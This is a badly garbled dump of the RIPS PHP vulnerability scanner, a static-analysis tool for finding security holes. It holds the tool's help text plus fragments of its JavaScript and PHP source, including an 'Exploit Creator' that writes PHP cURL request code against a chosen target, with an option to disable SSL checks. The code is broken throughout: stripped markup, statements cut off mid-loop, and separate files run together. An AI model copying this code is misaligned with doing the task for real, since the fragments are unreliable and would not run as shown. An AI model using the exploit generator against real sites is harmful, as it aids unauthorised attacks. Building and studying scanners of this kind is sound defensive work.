Finding vulnerabilities in PHP code
(via static code analysis)
By Peter Serwylo
http://peter.serwylo.com
@serwylo
scanning ...
Quickstart:
Locate your local PHP source code path/file (e.g. /var/www/project1/ or /var/www/index.php), choose the vulnerability type you are looking for and click scan!
Check subdirs to include all subdirectories into the scan. It is recommended to scan only the root directory of your project. Files in subdirectories will be automatically scanned by RIPS when included by the PHP code. However enabling subdirs can improve the scan result and the include success rate (shown in the result).
Advanced:
Debug errors or improve your scan result by choosing a different verbosity level (default level 1 is recommended).
After the scan finished 4 new button will appear in the upper right. You can select between different types of vulnerabilities that have been found by clicking on their name in the stats window. You can click user input in the upper right to get a list of entry points, functions for a list and graph of all user defined functions or files for a list and graph of all scanned files and their includes. All lists are referenced to the Code Viewer.
Style:
Change the syntax highlighting schema on-the-fly by selecting a different code style.
Before scanning you can choose which way the code flow should be displayed: bottom-up or top-down.
Icons:
- User input has been found in this line. Potential entry point for vulnerability exploitation.
- Vulnerability exploitation depends on the parameters passed to the function declared in this line. Have a look at the calls in the scan result.
Click ⇑ or ⇓ to jump to the next declaration or call of this function. - User-implemented securing has been detected in this line. This may prevent exploitation.
Options:
- Click the file icon to open the Code Viewer to review the original code. A new window will be opened with all relevant lines highlighted.
Highlight variables temporarily by mouseover or persistently by clicking on the variable. Jump into the code of a user-defined function by clicking on the call. Click return on the bottom of the code viewer to jump back. This also works for nested function calls. - Click the minimize icon to hide a specific code trace. You may display it later by clicking the icon again.
- Click the target icon to open the Exploit Creator. A new window will open where you can enter exploit details and create PHP Curl exploit code.
- Click the help icon to get a description, example code, example exploitation, patch and related securing functions for this vulnerability type.
- Click the data leak icon to check if the output of the tainted sink leaks somewhere (is embedded to the HTTP response via echo/print).
Hints:
- RIPS implements static source code analysis. It only scans source code files and will not execute the code.
- Object-oriented code (classes) is not supported in this version.
- Make sure RIPS has file permissions on the files to be scanned.
- Don't leave the webinterface of RIPS open to the public internet. Use it on your local webserver only.
- Only tested with Firefox.
//
$target = $argv[1];
"; var target = document.getElementById('target').value; var cookiejar = document.getElementById('cookiejar').value; var exectime = document.getElementById('exectime').value; var ssl = document.getElementById('ssl').checked var auth = document.getElementById('auth').checked if(document.getElementById('$_FILES') != undefined) output = output + "$postData = array();
$postData[ 'file' ] = \"@" + document.getElementById('$_FILES').elements[0].value + "\";
"; if(auth) { output = output + "$username = \"\";
$password = \"\";
"; } output = output + "$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
"; if(document.getElementById('$_GET') != undefined) { var getquery = getQuery('$_GET'); output = output + "curl_setopt($ch, CURLOPT_URL, \"" + target + '?' + getquery + "\");
"; output = output + "curl_setopt($ch, CURLOPT_HTTPGET, 1);
"; } else { output = output + "curl_setopt($ch, CURLOPT_URL, \"" + target + "\");
"; } output = output + "curl_setopt($ch, CURLOPT_USERAGENT, \"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\");
"; if(document.getElementById('$_POST') != undefined || document.getElementById('$_FILES') != undefined) output = output + "curl_setopt($ch, CURLOPT_POST, 1);
"; if(document.getElementById('$_POST') != undefined) { var postquery = getQuery('$_POST'); output = output + "curl_setopt($ch, CURLOPT_POSTFIELDS, \"" + postquery + "\");
"; } if(document.getElementById('$_FILES') != undefined) output = output + "curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
"; if(document.getElementById('$_COOKIE') != undefined) { var cookie = getQuery('$_COOKIE'); output = output + "curl_setopt($ch, CURLOPT_COOKIE, \"" + cookie + "\");
"; } if(document.getElementById('$_SERVER') != undefined) { var elements = document.getElementById('$_SERVER').elements; for(var i=0;i
"; else if(elements[i].name == 'HTTP_ACCEPT_LANGUAGE') output = output + "curl_setopt($ch, CURLOPT_HTTPHEADER, \"Accept-Language: "+elements[i].value+"\");
"; else if(elements[i].name == 'HTTP_ACCEPT_ENCODING') output = output + "curl_setopt($ch, CURLOPT_ENCODING, \""+elements[i].value+"\");
"; else if(elements[i].name == 'HTTP_ACCEPT_CHARSET') output = output + "curl_setopt($ch, CURLOPT_HTTPHEADER, \"Accept-Charset: "+elements[i].value+"\");
"; else if(elements[i].name == 'HTTP_KEEP_ALIVE') output = output + "curl_setopt($ch, CURLOPT_HTTPHEADER, array(\"Connection: keep-alive\", \"Keep-Alive: "+elements[i].value+"\"));
"; else if(elements[i].name == 'HTTP_CONNECTION') output = output + "curl_setopt($ch, CURLOPT_HTTPHEADER, \"Connection: "+elements[i].value+"\");
"; } } if(exectime != "") output = output + "curl_setopt($ch, CURLOPT_TIMEOUT, " + exectime + ");
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, " + exectime + ");
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, " + exectime + ");
"; if(cookiejar != "") output = output + "curl_setopt($ch, CURLOPT_COOKIEJAR, \"" + cookiejar + "\");
"; if(ssl) { output = output + "curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
"; output = output + "curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
"; output = output + "curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
"; } if(auth) { output = output + "curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
"; output = output + "curl_setopt($ch, CURLOPT_USERPWD, \"$username:$password\");
"; } output = output + "$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
"; output = output + "
echo $buf;
"; var exploitdiv = document.getElementById('exploitcode'); exploitdiv.innerHTML = output; exploitdiv.style.display = "block"; document.getElementById('exploitbuild').style.display = "none"; } function setssl() { var targetelement = document.getElementById('target'); var newset; var oldset = targetelement.value; if(document.getElementById('ssl').checked) { oldset = oldset.replace(/https:/, "http:"); newset = oldset.replace(/http:/, "https:"); } else { newset = oldset.replace(/https/, "http"); } targetelement.value = newset; } ================================================ FILE: js/hotpatch.js ================================================ function getParams(method) { var query = ""; var elements = document.getElementById(method).elements; for(var i=0;i
(' + data[0] + '/' + data[1] + ')'; document.getElementById(idprefix+"timeleft").innerHTML = 'appr. timeleft: ' + ( (Math.round(data[3]/60) > 1) ? (Math.round(data[3]/60) + ' min') : (Math.round(data[3]) + ' sec') ); } else { stats_done = true; } } } if (client.readyState == 4 && prevDataLength == client.responseText.length) { return; } } function scan(ignore_warning) { var location = encodeURIComponent(document.getElementById("location").value); var subdirs = Number(document.getElementById("subdirs").checked); var verbosity = document.getElementById("verbosity").value; var vector = document.getElementById("vector").value; var treestyle = document.getElementById("treestyle").value; var stylesheet = document.getElementById("css").value; var params = "loc="+location+"&subdirs="+subdirs+"&verbosity="+verbosity+"&vector="+vector+"&treestyle="+treestyle+"&stylesheet="+stylesheet; if(ignore_warning) params+="&ignore_warning=1"; document.getElementById("scanning").style.backgroundImage="url(css/scanning.gif)"; document.getElementById("scanning").innerHTML='scanning ...' document.getElementById("scanning").style.display="block"; prevDataLength = 0; nextLine = ''; var a = true; stats_done = false; client = new XMLHttpRequest(); client.onreadystatechange = function () { if(this.readyState == 3 && !stats_done) handleResponse('scan'); else if(this.readyState == 4 && this.status == 200 && a) { if(!this.responseText.match(/^\s*warning:/)) { document.getElementById("scanning").style.display="none"; document.getElementById("options").style.display=""; nostats = this.responseText.split("STATS_DONE.\n"); if(nostats[1]) result = nostats[1]; else result = nostats[0]; document.getElementById("result").innerHTML=(result); generateDiagram(); } else { var amount = this.responseText.split(':')[1]; var warning = "
";
warning+="
";
document.getElementById("scanning").style.backgroundImage="none";
document.getElementById("scanning").innerHTML=warning;
}
a=false;
}
else if (this.readyState == 4 && this.status != 200)
{
var warning = "warning
"; warning+="You are about to scan " + amount + " files. "; warning+="Depending on the amount of codelines and includes this may take a while."; warning+="The author of RIPS recommends to scan only the root directory of your project without subdirs.
"; warning+="Do you want to continue anyway?
"; warning+=" "; warning+=""; warning+="";
warning+="
";
document.getElementById("scanning").style.backgroundImage="none";
document.getElementById("scanning").innerHTML=warning;
}
}
client.open("POST", "main.php", true);
client.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
client.setRequestHeader("Content-length", params.length);
client.setRequestHeader("Connection", "close");
client.send(params);
}
function leakScan(hoveritem, varname, line, ignore_warning)
{
var title = 'Data Leak Scan - ' + varname;
var mywindow = document.getElementById("window2");
mywindow.style.display="block";
mywindow.style.width=700;
mywindow.style.height=350;
if(hoveritem)
{
if(hoveritem != 3 && hoveritem != 4)
var tmp = hoveritem.offsetParent;
else
var tmp = document.getElementById("windowtitle"+hoveritem);
mywindow.style.top = tmp.offsetParent.offsetTop - 90;
mywindow.style.right = 250;
}
document.getElementById("windowtitle2").innerHTML=title;
var location = encodeURIComponent(document.getElementById("location").value);
var subdirs = Number(document.getElementById("subdirs").checked);
var treestyle = document.getElementById("treestyle").value;
var params = "loc="+location+"&subdirs="+subdirs+"&treestyle="+treestyle+"&varname="+varname+"&line="+line;
if(ignore_warning)
params+="&ignore_warning=1";
document.getElementById("windowcontent2").innerHTML = '';
var scandiv = document.createElement('div');
scandiv.className="scanning";
scandiv.style.marginTop="30px";
scandiv.style.marginLeft="150px";
scandiv.style.backgroundImage="url(css/scanning.gif)";
scandiv.innerHTML='scanning ...';
scandiv.id="dataleakscanning";
scandiv.style.display="block";
document.getElementById("windowcontent2").appendChild(scandiv);
var a = true;
stats_done = false;
client = new XMLHttpRequest();
client.onreadystatechange = function ()
{
if(this.readyState == 3 && !stats_done)
handleResponse('leakscan');
else if(this.readyState == 4 && this.status == 200 && a)
{
if(!this.responseText.match(/^\s*warning:/))
{
document.getElementById("dataleakscanning").style.display="none";
nostats = this.responseText.split("STATS_DONE.\n");
if(nostats[1])
document.getElementById("windowcontent2").innerHTML=(nostats[1]);
else
document.getElementById("windowcontent2").innerHTML='Network error (HTTP "+this.status+")
"; if(this.status == 0) warning+="Could not access main.php. Make sure your webserver is running.
"; else if(this.status == 404) warning+="Could not access main.php. Make sure you copied all files.
"; else if(this.status == 500) warning+="Scan aborted. Try to scan only one entry file at once or increase the set_time_limit() in config/general.php.
"; warning+="";
warning+="
";
document.getElementById("dataleakscanning").style.backgroundImage="none";
document.getElementById("dataleakscanning").innerHTML=warning;
}
a=false;
}
else if (this.readyState == 4 && this.status != 200)
{
var warning = "warning
"; warning+="You are about to scan " + amount + " files. "; warning+="Depending on the amount of codelines and includes this may take a while. "; warning+="The author of RIPS recommends to scan only the root directory of your project without subdirs.
"; warning+="Do you want to continue anyway?
"; warning+=" "; warning+=""; warning+="";
warning+="
";
document.getElementById("dataleakscanning").style.backgroundImage="none";
document.getElementById("dataleakscanning").innerHTML=warning;
}
}
client.open("POST", "windows/leakscan.php", true);
client.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
client.setRequestHeader("Content-length", params.length);
client.setRequestHeader("Connection", "close");
client.send(params);
}
/* SEARCH */
function search()
{
var location = encodeURIComponent(document.getElementById("location").value);
var subdirs = Number(document.getElementById("subdirs").checked);
var regex = encodeURIComponent(document.getElementById("search").value);
var stylesheet = document.getElementById("css").value;
var params = 'loc='+location+'&subdirs='+subdirs+'&search=1®ex='+regex+'&ignore_warning=1&treestyle=1&stylesheet='+stylesheet;
document.getElementById("scanning").style.backgroundImage="url(css/scanning.gif)";
document.getElementById("scanning").innerHTML='searching ...';
document.getElementById("scanning").style.display="block";
var animation = window.setInterval("scanAnimation(document.getElementById('scanned'))", 300);
var a = true;
var client = new XMLHttpRequest();
client.onreadystatechange = function ()
{
if(this.readyState == 4 && this.status == 200 && a)
{
document.getElementById("scanning").style.display="none";
window.clearInterval(animation);
document.getElementById("options").style.display="none";
document.getElementById("result").innerHTML=(this.responseText);
a=false;
}
else if (this.readyState == 4 && this.status != 200)
{
alert("Network error ("+this.status+").");
}
}
client.open("POST", "main.php", true);
client.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
client.setRequestHeader("Content-length", params.length);
client.setRequestHeader("Connection", "close");
client.send(params);
}
/* CODE STYLE */
function setActiveStyleSheet(title)
{
var i, a;
for(i=0; (a = document.getElementsByTagName("link")[i]); i++)
{
if(a.getAttribute("rel").indexOf("style") != -1 && a.getAttribute("title"))
{
a.disabled = true;
if(a.getAttribute("title") == title) a.disabled = false;
}
}
}
function hide(tag)
{
if(document.getElementById(tag).style.display != "none")
{
document.getElementById(tag).style.display="none";
document.getElementById("pic"+tag).className='plusico';
}
else
{
document.getElementById(tag).style.display="block";
document.getElementById("pic"+tag).className='minusico';
}
}
function catshow(tag)
{
var elements = document.getElementsByName('allcats');
for(var i=0;iNetwork error (HTTP "+this.status+")
"; if(this.status == 0) warning+="Could not access windows/leakscan.php. Make sure your webserver is running.
"; else if(this.status == 404) warning+="Could not access windows/leakscan.php. Make sure you copied all files.
"; else if(this.status == 500) warning+="Scan aborted. Try to scan only one entry file at once or increase the set_time_limit() in config/general.php.
"; warning+="- ';
foreach ($tree->children as $child)
{
$lines = traverseTopDown($child, false, $lines);
}
// do not display a line twice
// problem: different lines in different files with equal line number
if(!isset($lines[$tree->line]))
{
echo '
- requires:';
foreach ($tree->dependencies as $linenr=>$dependency)
{
if(!empty($dependency))
{
echo '
- '.highlightline($dependency, '', $linenr).'
',
'File: ',key($output),'
', '
'; foreach($output[key($output)] as $vulnBlock) { if($vulnBlock->vuln) { $nr++; echo '',"\n";
}
}
echo '
', '
'; foreach($output[key($output)] as $vulnBlock) { if($vulnBlock->vuln) { $nr++; echo '
',
'
',$vulnBlock->category,'
',
'';
if($treestyle == 2)
krsort($vulnBlock->treenodes);
foreach($vulnBlock->treenodes as $tree)
{
// we do not have a prescan yet so RIPS misses function calls before the actual declaration, so we output vulns in functions without function call too (could have happened earlier)
// if(empty($tree->funcdepend) || $tree->foundcallee )
{
echo '',"\n",
'
',"\n";
}
}
if(!empty($vulnBlock->alternatives))
{
echo '
';
}
echo '
| ',"\n",
''."\n",
' ',"\n"; if(isset($GLOBALS['scan_functions'][$tree->name])) { // help button echo '',"\n"; if(isset($GLOBALS['F_DATABASE'][$tree->name]) || isset($GLOBALS['F_FILE_AFFECT'][$tree->name]) || isset($GLOBALS['F_FILE_READ'][$tree->name]) || isset($GLOBALS['F_LDAP'][$tree->name]) || isset($GLOBALS['F_XPATH'][$tree->name]) || isset($GLOBALS['F_POP'][$tree->name]) ) { // data leak scan if(!empty($vulnBlock->dataleakvar)) { echo '',"\n"; // line } else { $tree->title .= ' (Blind exploitation)'; } } } if(!empty($tree->get) || !empty($tree->post) || !empty($tree->cookie) || !empty($tree->files) || !empty($tree->server) ) { /*echo '',"\n",*/ echo ''; } // $tree->title echo ' | ',$tree->title,'',
' ',"\n";
if($treestyle == 1)
traverseBottomUp($tree);
else if($treestyle == 2)
traverseTopDown($tree);
echo ' ',"\n", '
|
|
',"\n"; } else if(count($output) == 1) { echo '
Nothing vulnerable found. Change the verbosity level or vulnerability type and try again.
';
}
}
while(next($output));
}
else if(count($GLOBALS['scanned_files']) > 0)
{
echo 'Nothing vulnerable found. Change the verbosity level or vulnerability type and try again.
';
}
else
{
echo 'Nothing to scan. Please check your path/file name.
';
}
}
// build list of available functions
function createFunctionList($user_functions_offset)
{
if(!empty($user_functions_offset))
{
ksort($user_functions_offset);
if($GLOBALS['file_amount'] <= WARNFILES)
$js = 'graph2 = new Graph(document.getElementById("functioncanvas"));'."\n";
else
$js = 'canvas = document.getElementById("functioncanvas");ctx = canvas.getContext("2d");ctx.fillStyle="#ff0000";ctx.fillText("Graphs have been disabled for a high file amount (>'.WARNFILES.').", 20, 30);';
$x=20;
$y=50;
$i=0;
if($GLOBALS['file_amount'] <= WARNFILES)
{
// create JS graph elements
foreach($user_functions_offset as $func_name => $info)
{
if($func_name !== '__main__')
{
$x = ($i%4==0) ? $x=20 : $x=$x+160;
$y = ($i%4==0) ? $y=$y+70 : $y=$y;
$i++;
$func_varname = str_replace('::', '', $func_name);
$js.= "var e$func_varname = graph2.addElement(pageTemplate, { x:$x, y:$y }, '".addslashes($func_name)."( )', '', '".(isset($info[5]) ? $info[5] : 0)."', '".(isset($info[6]) ? $info[6] : 0)."', 0);\n";
} else
{
$js.='var e__main__ = graph2.addElement(pageTemplate, { x:260, y:20 }, "__main__", "", "'.(isset($info[5]) ? $info[5] : 0).'", "'.(isset($info[6]) ? $info[6] : 0).'", 0);'."\n";
}
}
}
echo '| declaration | calls |
|---|---|
',$func_name,' | '; $calls = array(); if(isset($info[3])) { foreach($info[3] as $call) { $calls[] = ''.$call[1].''; } } echo implode(',',array_unique($calls)).' |
| type[parameter] | taints |
|---|---|
| $input_name | ",implode(',',array_unique($finds)),' |
',htmlentities($filename),' |
',htmlentities($filename),'
|
',$amount,'
var:".$var_name; echo " varkeys:";print_r($var_token[3]); echo " declarekeys:";print_r($var_declare->array_keys); echo " diff:"; print_r($array_key_diff); echo " |||"; #if(!empty($var_declare->array_keys)) die(print_r($var_declare->array_keys) . print_r($var_keys)); if( $var_declare->id < $last_token_id && (empty($array_key_diff) || in_array('*', $array_key_diff) || in_array('*', $var_declare->array_keys)) /* && (empty($var_declare->array_keys) || empty($var_keys) || $var_declare->array_keys == $var_keys || in_array('*', $var_keys) || in_array('*', $array_key_diff) || in_array('*', $var_declare->array_keys) ) */ ) { $comment = ''; // add line to output if(count($mainparent->lines) < MAXTRACE) { $clean_vars_before_ifelse = false; // add same var_name with different dependencies if(!empty($var_declare->dependencies) && $mainparent->dependencies != $var_declare->dependencies ) { foreach($var_declare->dependencies as $deplinenr=>$dependency) { if( !isset($mainparent->dependencies[$deplinenr]) && $deplinenr != $var_declare->line ) { $vardependent = true; $comment.= tokenstostring($dependency).', '; // if dependencie has an ELSE clause, same vars before are definetely overwritten if($dependency[count($dependency)-1][0] === T_ELSE) $clean_vars_before_ifelse = true; } } } // stop at var declarations before if else statement. they are overwritten if($clean_vars_before_ifelse) { for($c=0;$c
"; /************************* T_VARIABLE *************************/ if($token_name === T_VARIABLE) { // $var() if($this->tokens[$i+1][0] === '(') { $this->variable_scan($i, 0, 'eval', 'Userinput is used as dynamic function name. Arbitrary functions may be called.'); } // $$var = else if( ($this->tokens[$i-1] === '$' || ($this->tokens[$i-1] === '{' && $this->tokens[$i-2] === '$')) && ($this->tokens[$i+1] === '=' || in_array($this->tokens[$i+1][0], Tokens::$T_ASSIGNMENT)) ) { $this->variable_scan($i, $this->tokens[$i-1] === '{' ? 2 : 1, 'extract', 'Userinput is used to build the variable name. Arbitrary variables may be overwritten/initialized which may lead to further vulnerabilities.'); } // foreach($var as $key => $value) else if( $this->tokens[$i-1][0] === T_AS || ($this->tokens[$i-1][0] === T_DOUBLE_ARROW && $this->tokens[$i-2][0] === T_VARIABLE && $this->tokens[$i-3][0] === T_AS) ) { $c=3; while($this->tokens[$i-$c][0] !== T_FOREACH) { $c++; if(($i-$c)<0 || $this->tokens[$i-$c] === ';') { addError('Could not find FOREACH token before AS token', array_slice($this->tokens, $i-5, 10), $this->tokens[$i-1][2], $this->file_pointer); break; } } $this->variable_add( $token_value, array_slice($this->tokens, $i-$c, $c+Analyzer::getBraceEnd($this->tokens, $i)), '', 0, 0, $line_nr, $i, isset($this->tokens[$i][3]) ? $this->tokens[$i][3] : array() ); } // for($var=1; ...) : add whole instruction block to output else if( $this->tokens[$i-2][0] === T_FOR && ($this->tokens[$i+1] === '=' || in_array($this->tokens[$i+1][0], Tokens::$T_ASSIGNMENT)) ) { $c=1; $newbraceopen = 1; $firstsemi = 0; // do not use getBraceEnd() here, because we dont want to stop at ';' in for(;;) while( $newbraceopen !== 0 ) { // watch function calls in function call if( $this->tokens[$i + $c] === '(' ) { $newbraceopen++; } else if( $this->tokens[$i + $c] === ')' ) { $newbraceopen--; } else if( $this->tokens[$i + $c] === ';' && $firstsemi < 1 ) { $firstsemi = $c; } $c++; if(!isset($this->tokens[$i+$c])) { addError('Could not find closing parenthesis of for-statement.', array_slice($this->tokens, $i-2, 10), $this->tokens[$i-2][2], $this->file_pointer); break; } } // overwrite value of first var because it is looped // this is an assumption, other vars could be declared for($var1=1;$var2=2;...) $this->tokens[$i+2][0] = T_ENCAPSED_AND_WHITESPACE; $this->tokens[$i+2][1] = '*'; $this->variable_add( $token_value, array_slice($this->tokens, $i-2, $c+2), '', 1, 2+$firstsemi, $line_nr, $i, isset($this->tokens[$i][3]) ? $this->tokens[$i][3] : array() ); } // $var = ...; else if( $this->tokens[$i+1] === '=' || in_array($this->tokens[$i+1][0], Tokens::$T_ASSIGNMENT) ) { $vardeclare = array(); // $var = array(1,2,3,4); if($this->tokens[$i+2][0] === T_ARRAY && $this->tokens[$i+3] === '(' && $this->tokens[$i+4] !== ')') { $d = 4; $keyindex = 0; $newbraceopen = 1; $keytokens = array(); $valuetokens = array(); while( !($newbraceopen === 0 || $this->tokens[$i + $d] === ';') && $keyindex < MAX_ARRAY_ELEMENTS ) { // count parameters if( $newbraceopen === 1 && ($this->tokens[$i + $d] === ',' || $this->tokens[$i + $d] === ')' )) { $newindexvar = $this->tokens[$i]; $newindexvar[3][] = empty($keytokens) ? $keyindex : $keytokens; $this->variable_add( $token_value, array_merge(array($newindexvar,$this->tokens[$i+1]), $valuetokens), ' array() ', in_array($this->tokens[$i+1][0], Tokens::$T_ASSIGNMENT) ? 0 : 1, 0, $line_nr, $i, isset($this->tokens[$i][3]) ? $this->tokens[$i][3] : array(), empty($keytokens) ? $keyindex : $keytokens ); $keyindex++; $keytokens = array(); $valuetokens = array(); } // watch function calls in array braces else if( $this->tokens[$i + $d] === '(' ) { $newbraceopen++; } else if( $this->tokens[$i + $d] === ')' ) { $newbraceopen--; } // "=>" detected, tokens before are keyname, next one value else if( $this->tokens[$i + $d][0] === T_DOUBLE_ARROW ) { $keytokens = $valuetokens; $valuetokens = array(); } // main else { $valuetokens[] = $this->tokens[$i + $d]; } $d++; if(!isset($this->tokens[$i+$d])) { addError('Could not find closing parenthesis of array()-declaration.', array_slice($this->tokens, $i, 10), $this->tokens[$i+2][2], $this->file_pointer); break; } } $vardeclare['end'] = Analyzer::getBraceEnd($this->tokens, $i)+1; // $var = anything; } else { $this->variable_add( $token_value, array_slice($this->tokens, $i, $vardeclare['end'] = Analyzer::getBraceEnd($this->tokens, $i)+1), '', in_array($this->tokens[$i+1][0], Tokens::$T_ASSIGNMENT) ? 0 : 1, 0, $line_nr, $i, isset($this->tokens[$i][3]) ? $this->tokens[$i][3] : array() ); } // save var and var declare scope for data leak scan $vardeclare['start'] = $i; $vardeclare['name'] = $token_value; $vardeclare['linenr'] = $line_nr; $vardeclare['end'] += $i-1; } // $class->var //else if ($token_name === T_STRING && $tokens[$i-1][0] === T_OBJECT_OPERATOR && $tokens[$i-2][0] === T_VARIABLE) // add user input variables to global finding list if( in_array($token_value, Sources::$V_USERINPUT) ) { if(isset($this->tokens[$i][3])) { if(!is_array($this->tokens[$i][3][0])) $GLOBALS['user_input'][$token_value.'['.$this->tokens[$i][3][0].']'][$this->file_pointer][] = $line_nr; else $GLOBALS['user_input'][$token_value.'['.Analyzer::get_tokens_value( $this->file_pointer, $this->tokens[$i][3][0], $this->in_function ? $this->var_declares_local : $this->var_declares_global, $this->var_declares_global, $i ).']'][$this->file_pointer][] = $line_nr; } else $GLOBALS['user_input'][$token_value][$this->file_pointer][] = $line_nr; // count found userinput in function for graphs if($this->in_function) { $GLOBALS['user_functions_offset'][$this->function_obj->name][5]++; } else { $GLOBALS['user_functions_offset']['__main__'][5]++; } } } // check if token is a function call and a function to scan // do not check if next token is '(' because: require $inc; does not use () else if( in_array($token_name, Tokens::$T_FUNCTIONS) || (in_array($token_name, Tokens::$T_XSS) && ($_POST['vector'] == 'client' || $_POST['vector'] == 'xss' || $_POST['vector'] == 'all')) ) { $class=''; /************************* T_STRING *************************/ if($token_name === T_STRING && $this->tokens[$i+1] === '(') { // define("FOO", $_GET['asd']); if($token_value === 'define') { $c=1; while($this->tokens[$i+$c] !== ',') { $c++; if($this->tokens[$i+$c] === ';' || !isset($this->tokens[$i+$c])) { addError('Second parameter of define() is missing.', array_slice($this->tokens, $i, $c), $this->tokens[$i][2], $this->file_pointer); break; } } $this->variable_add( str_replace(array('"',"'"), '', $this->tokens[$i+2][1]), array_slice($this->tokens, $i, Analyzer::getBraceEnd($this->tokens, $i)+1), ' define() ', $c, 0, $line_nr, $i ); } // ini_set() else if($token_value === 'ini_set') { $setting = str_replace(array("'", '"'), '', $this->tokens[$i+2][1]); // ini_set('include_path', 'foo/bar') if ($setting === 'include_path') { $path = Analyzer::get_tokens_value( $this->file_pointer, array_slice($this->tokens, $i+4,Analyzer::getBraceEnd($this->tokens, $i+4)+1), $this->in_function ? $this->var_declares_local : $this->var_declares_global, $this->var_declares_global, $i ); $this->include_paths = array_unique(array_merge($this->include_paths, Analyzer::get_ini_paths($path))); } } // set_include_path('foo/bar') else if($token_value === 'set_include_path') { $path = Analyzer::get_tokens_value( $this->file_pointer, array_slice($this->tokens, $i+1,Analyzer::getBraceEnd($this->tokens, $i+1)+1), $this->in_function ? $this->var_declares_local : $this->var_declares_global, $this->var_declares_global, $i ); $this->include_paths = array_unique(array_merge($this->include_paths, Analyzer::get_ini_paths($path))); } // treat error handler as called function else if($token_value === 'set_error_handler') { $token_value = str_replace(array('"',"'"), '', $this->tokens[$i+2][1]); } // $array = compact("event", "city"); else if($token_value === 'compact' && $this->tokens[$i-2][0] === T_VARIABLE) { $f=2; while( $this->tokens[$i+$f] !== ')' ) { // for all array keys save new variable declarations if($this->tokens[$i+$f][0] === T_CONSTANT_ENCAPSED_STRING) { $this->variable_add( $this->tokens[$i-2][1], array( array( T_VARIABLE, $this->tokens[$i-2][1], $line_nr, array(str_replace(array('"',"'"),'',$this->tokens[$i+$f][1])) ), '=', array(T_VARIABLE, '$'.str_replace(array('"',"'"), '', $this->tokens[$i+$f][1]), $line_nr), ';' ), ' compact() ', 2, 0, $line_nr, $i, $this->tokens[$i-2][3], str_replace(array('"',"'"),'',$this->tokens[$i+$f][1]) ); } $f++; if($this->tokens[$i+$f] === ';' || !isset($this->tokens[$i+$f])) { addError('Closing parenthesis of compact() is missing.', array_slice($this->tokens, $i, $f), $this->tokens[$i][2], $this->file_pointer); break; } } } // preg_match($regex, $source, $matches), save $matches as var declare else if($token_value === 'preg_match' || $token_value === 'preg_match_all') { $c = 2; $parameter = 1; $newbraceopen = 1; while( $newbraceopen !== 0 ) { if( is_array($this->tokens[$i + $c]) && $this->tokens[$i + $c][0] === T_VARIABLE && $parameter == 3) { // add variable declaration to beginning of varlist // fake assignment parameter so it will not get traced $this->variable_add( $this->tokens[$i + $c][1], array_slice($this->tokens,$i,Analyzer::getBraceEnd($this->tokens,$i+2)+3), ' preg_match() ', 0, $c-1, $this->tokens[$i + $c][2], $i, isset($this->tokens[$i+$c][3]) ? $this->tokens[$i+$c][3] : array() ); } // count parameters else if( $newbraceopen === 1 && $this->tokens[$i + $c] === ',' ) { $parameter++; } // watch function calls in function call else if( $this->tokens[$i + $c] === '(' ) { $newbraceopen++; } else if( $this->tokens[$i + $c] === ')' ) { $newbraceopen--; } else if($this->tokens[$i+$c] === ';' || !isset($this->tokens[$i+$c])) { addError('Closing parenthesis of '.$token_value.'() is missing.', array_slice($this->tokens, $i, $c), $this->tokens[$i][2], $this->file_pointer); break; } $c++; } } // import_request_variables() else if($token_value === 'import_request_variables') { // add register_globals implementation $this->variable_add( 'register_globals', array_slice($this->tokens, $i, Analyzer::getBraceEnd($this->tokens, $i+1)+1), 'register_globals implementation', 0, 0, $line_nr, $i, isset($this->tokens[$i][3]) ? $this->tokens[$i][3] : array() ); } // parse_str() else if($token_value === 'parse_str') { $c = 2; $parameter = 1; $newbraceopen = 1; while( $newbraceopen !== 0 ) { if( is_array($this->tokens[$i + $c]) && $this->tokens[$i + $c][0] === T_VARIABLE && $parameter == 2) { // add variable declaration to beginning of varlist // fake assignment parameter so it will not get traced $this->variable_add( $this->tokens[$i + $c][1], array_slice($this->tokens,$i,Analyzer::getBraceEnd($this->tokens,$i+2)+3), ' parse_str() ', 0, $c-1, $this->tokens[$i + $c][2], $i, isset($this->tokens[$i+$c][3]) ? $this->tokens[$i+$c][3] : array() ); } // count parameters else if( $newbraceopen === 1 && $this->tokens[$i + $c] === ',' ) { $parameter++; } // watch function calls in function call else if( $this->tokens[$i + $c] === '(' ) { $newbraceopen++; } else if( $this->tokens[$i + $c] === ')' ) { $newbraceopen--; } else if($this->tokens[$i+$c] === ';' || !isset($this->tokens[$i+$c])) { addError('Closing parenthesis of '.$token_value.'() is missing.', array_slice($this->tokens, $i, $c), $this->tokens[$i][2], $this->file_pointer); break; } $c++; } } //add interesting function calls to info gathering if( isset($this->info_functions[$token_value]) ) { $GLOBALS['info'][] = $this->info_functions[$token_value]; } // watch constructor calls $var = Classname($constructor_param); else if( $this->tokens[$i-1][0] !== T_NEW && isset($this->vuln_classes[$token_value]) ) { $this->class_vars[ $this->tokens[$i-2][1] ] = $token_value; } // add function call to user-defined function list else { // $classvar->bla() if($this->tokens[$i-1][0] === T_OBJECT_OPERATOR) { $classvar = $this->tokens[$i-2][1]; if($classvar[0] !== '$') $classvar = '$'.$classvar; $class = ($classvar === '$this' || $classvar === '$self') ? $this->class_name : $this->class_vars[$classvar]; } // CLASS::func() else if($this->tokens[$i-1][0] === T_DOUBLE_COLON) { $class = $this->tokens[$i-2][1]; } // save function call for graph if(isset($GLOBALS['user_functions_offset'][($class?$class.'::':'').$token_value])) { $GLOBALS['user_functions_offset'][($class?$class.'::':'').$token_value][3][] = array($this->file_pointer, $line_nr); if($this->in_function) { $GLOBALS['user_functions_offset'][$this->function_obj->name][4][] = $token_value; } else { $GLOBALS['user_functions_offset']['__main__'][4][] = $token_value; } } // check if token is function call that affects variable scope (global) if( isset($this->globals_from_function[$token_value]) ) { // put all previously saved global var assignments to global scope foreach($this->globals_from_function[$token_value] as $var_name=>$new_vars) { foreach($new_vars as $new_var) { 